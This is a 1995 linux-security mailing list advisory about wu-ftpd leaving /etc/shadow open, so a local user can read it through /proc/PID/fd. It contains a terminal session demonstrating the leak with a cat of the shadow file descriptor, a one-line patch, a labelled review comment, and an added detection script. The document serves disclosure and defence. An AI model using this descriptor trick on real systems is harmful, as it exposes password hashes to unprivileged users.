[260] in linux-security and linux-alert archive
Another problem with wu-ftpd (shadow)
daemon@ATHENA.MIT.EDU (Marek Michalkiewicz)
Sat Jun 10 01:10:21 1995
From: Marek Michalkiewicz <marekm@i17linuxb.ists.pwr.wroc.pl>
To: linux-security@tarsier.cv.nrao.edu
Date: Fri, 9 Jun 1995 16:08:12 +0200 (MET DST)
Hi,
This affects wu-ftpd and possibly any other programs with incorrectly
hacked-in shadow support. Non-shadow versions found in most Linux
distributions are not affected - or are all affected and you can't fix it
because /etc/passwd is world-readable, depending on how you look at it...
This is related to the /proc security problem discussed recently - normal
users can read /etc/shadow because this file is not closed and /proc gives
access to all open files.
Below is how to check if you are vulnerable:
Script started on Fri Jun 9 15:09:49 1995
marekm@i17linuxa:~$ ftp -n localhost
Connected to localhost.
220 i17linuxa FTP server (Version wu-2.4(2) Thu Jun 1 20:05:10 MET DST 1995) ready.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> user marekm
331 Password required for marekm.
Password:
230 User marekm logged in.
ftp> ^Z
[1]+ Stopped ftp -n localhost
marekm@i17linuxa:~$ ps uwx
USER       PID %CPU %MEM SIZE  RSS TTY STAT START  TIME COMMAND
marekm   15510  0.0  5.4  384  384 pp6 S    14:32  0:01 -bash
marekm   15808  0.2  2.2   29  156 pp6 S    15:09  0:00 script
marekm   15809  0.1  2.3   29  168 pp6 S    15:09  0:00 script
marekm   15810  1.3  6.7  377  472 pp4 S    15:09  0:00 bash -i
marekm   15811  0.7  3.9  113  276 pp4 T    15:09  0:00 ftp -n localhost
marekm   15812  2.0  7.1  157  500 con S    15:09  0:00 -localhost: marekm: IDLE
marekm   15816  0.0  3.1   64  224 pp4 R    15:10  0:00 ps uwx
marekm@i17linuxa:~$ ls -al /proc/15812/fd
total 0
dr-x------ 2 marekm users 0 Jun 9 15:10 .
dr-xr-xr-x 4 marekm users 0 Jun 9 15:10 ..
lrwx------ 1 marekm users 64 Jun 9 15:10 0 -> [0000]:0
lrwx------ 1 marekm users 64 Jun 9 15:10 1 -> [0000]:0
l-wx------ 1 marekm users 64 Jun 9 15:10 10 -> [0301]:4623
l-wx------ 1 marekm users 64 Jun 9 15:10 11 -> [0301]:4624
l-wx------ 1 marekm users 64 Jun 9 15:10 2 -> [0301]:10404
lrwx------ 1 marekm users 64 Jun 9 15:10 3 -> [0000]:0
lrwx------ 1 marekm users 64 Jun 9 15:10 4 -> [0000]:0
lr-x------ 1 marekm users 64 Jun 9 15:10 5 -> [0301]:38392
lr-x------ 1 marekm users 64 Jun 9 15:10 6 -> [0301]:8567
lrwx------ 1 marekm users 64 Jun 9 15:10 7 -> [0301]:34549
lr-x------ 1 marekm users 64 Jun 9 15:10 8 -> [0301]:8569
lr-x------ 1 marekm users 64 Jun 9 15:10 9 -> [0301]:32007
marekm@i17linuxa:~$ ls -i /etc/shadow
32007 /etc/shadow
marekm@i17linuxa:~$ cat /proc/15812/fd/9
[ snip - I don't want everyone to see my /etc/shadow :-) ]
marekm@i17linuxa:~$ fg
ftp -n localhost
221 Goodbye.
marekm@i17linuxa:~$ exit
Script done on Fri Jun 9 15:11:26 1995
OK, now for the fix:
--- ftpd.c.orig Thu Jun 1 19:27:42 1995
+++ ftpd.c Fri Jun 9 14:50:46 1995
@@ -996,6 +996,7 @@
struct spwd *spw = getspnam( pw->pw_name );
if( !spw ) { pw->pw_passwd = ""; }
else { pw->pw_passwd = spw->sp_pwdp; }
+ endspent();
}
#endif
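Review bot: the added endspent() closes the shadow file, but pw->pw_passwd still aliases the static storage that getspnam() returned (spw->sp_pwdp), so any later getspnam()/getspent() call in the same daemon process overwrites the hash before it is compared; copy it first, e.g. `pw->pw_passwd = strdup(spw->sp_pwdp);` with a NULL check, and only then call endspent(). The `!spw` branch also deserves a one-line comment: it leaves pw_passwd as "", and the hunk does not show whether the caller treats an empty field as "no login" or as "empty password", which is worth confirming while this code is being touched.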
Now /etc/shadow is correctly closed as soon as possible. The right fix
is IMHO to do some more checks in the kernel to remove /proc holes, but
I am not in a position to do it correctly... Linus, 1.2.10? :-)
Regards,
Marek Michalkiewicz
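The manual check in the post (suspend the ftp session, find the daemon in ps, list /proc/PID/fd, compare inodes) as a script. This is an added example, not code from the original post or from wu-ftpd: it walks /proc/<pid>/fd/* and reports every descriptor that refers to the same file as the path given, so you can run it against /etc/shadow while a daemon is mid-login. It assumes a Linux /proc and GNU coreutils stat; modern kernels show the link target as a pathname rather than the "[0301]:32007" dev:inode form in the post, so the script compares device and inode numbers with stat -L, which follows the /proc magic link to the open file. find_holders is a name chosen here, not a tool that exists anywhere.

```shell
#!/bin/sh
# Added example (not from the original post): script version of the
# /proc/<pid>/fd check described above.
#
# Assumptions: Linux /proc, GNU coreutils stat (-L follows the magic
# link, -c '%d:%i' prints device:inode). Descriptors of processes we are
# not allowed to inspect make stat fail and are silently skipped, so as
# an unprivileged user you only see daemons running under your own uid,
# which is exactly the wu-ftpd case: the daemon has already switched to
# the logged-in user but still holds /etc/shadow open.

# find_holders PATH  ->  prints "PID FD COMMAND" for each descriptor
# in any inspectable process that refers to the same file as PATH.
find_holders() {
    target=$1
    target_id=$(stat -Lc '%d:%i' "$target") || return 1
    # The glob is expanded once, so processes created by the loop's own
    # command substitutions are not listed; ones that exit mid-scan just
    # fail the stat and are skipped.
    for fdlink in /proc/[0-9]*/fd/*; do
        id=$(stat -Lc '%d:%i' "$fdlink" 2>/dev/null) || continue
        [ "$id" = "$target_id" ] || continue
        pid=${fdlink#/proc/}; pid=${pid%%/*}
        fd=${fdlink##*/}
        # cmdline is NUL-separated; a process may vanish before we read it
        cmd=$(tr '\0' ' ' 2>/dev/null < "/proc/$pid/cmdline") || cmd='?'
        printf '%s %s %s\n' "$pid" "$fd" "$cmd"
    done
    return 0
}

# Stand-alone usage: "sh thisscript /etc/shadow". On a box with the
# wu-ftpd bug, a suspended "ftp -n localhost" login makes the
# "-localhost: user: IDLE" daemon appear here, owned by that user.
if [ -n "${1:-}" ]; then
    find_holders "$1"
fi
```

Run it as the unprivileged ftp user while the ftp session is stopped with ^Z; an empty result for /etc/shadow after applying the endspent() patch is the confirmation that the file is closed before the daemon drops to the user's uid.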